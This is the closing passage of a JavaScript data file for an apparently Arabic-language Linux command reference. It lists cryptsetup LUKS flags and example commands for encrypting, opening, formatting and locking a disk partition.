   {flag:'luksFormat',desc:'تهيئة وتشفير القسم وطلب تعيين كلمة مرور خام (تدمير البيانات القديمة)'},
   {flag:'luksOpen',desc:'فك تشفير القسم وفتحه وتعيين اسم خريطة له في /dev/mapper/'},
   {flag:'luksClose',desc:'إغلاق القسم المشفر وقفل البيانات مجدداً'},
   {flag:'luksHeaderBackup',desc:'أخذ نسخة احتياطية من ترويسة التشفير (مهم جداً!)'},
   {flag:'luksAddKey',desc:'إضافة مفتاح أو كلمة مرور جديدة لفتح التشفير'},
 ],
 examples:[
   'sudo cryptsetup luksFormat /dev/sdb1 # تشفير قسم بالكامل',
   'sudo cryptsetup luksOpen /dev/sdb1 private_disk # فتح وتسمية القرص المشفر',
   'sudo mkfs.ext4 /dev/mapper/private_disk # تهيئة القسم المفتوح بنظام ext4 لاستخدامه',
   'sudo cryptsetup luksClose private_disk # قفل وتأمين القرص بعد الاستخدام',
 ],
},

]; // END OF COMMANDS ARRAY

// Auto-calculate stats
console.log('[Encyclopedia] Loaded', window.LINUX_COMMANDS.length, 'commands');
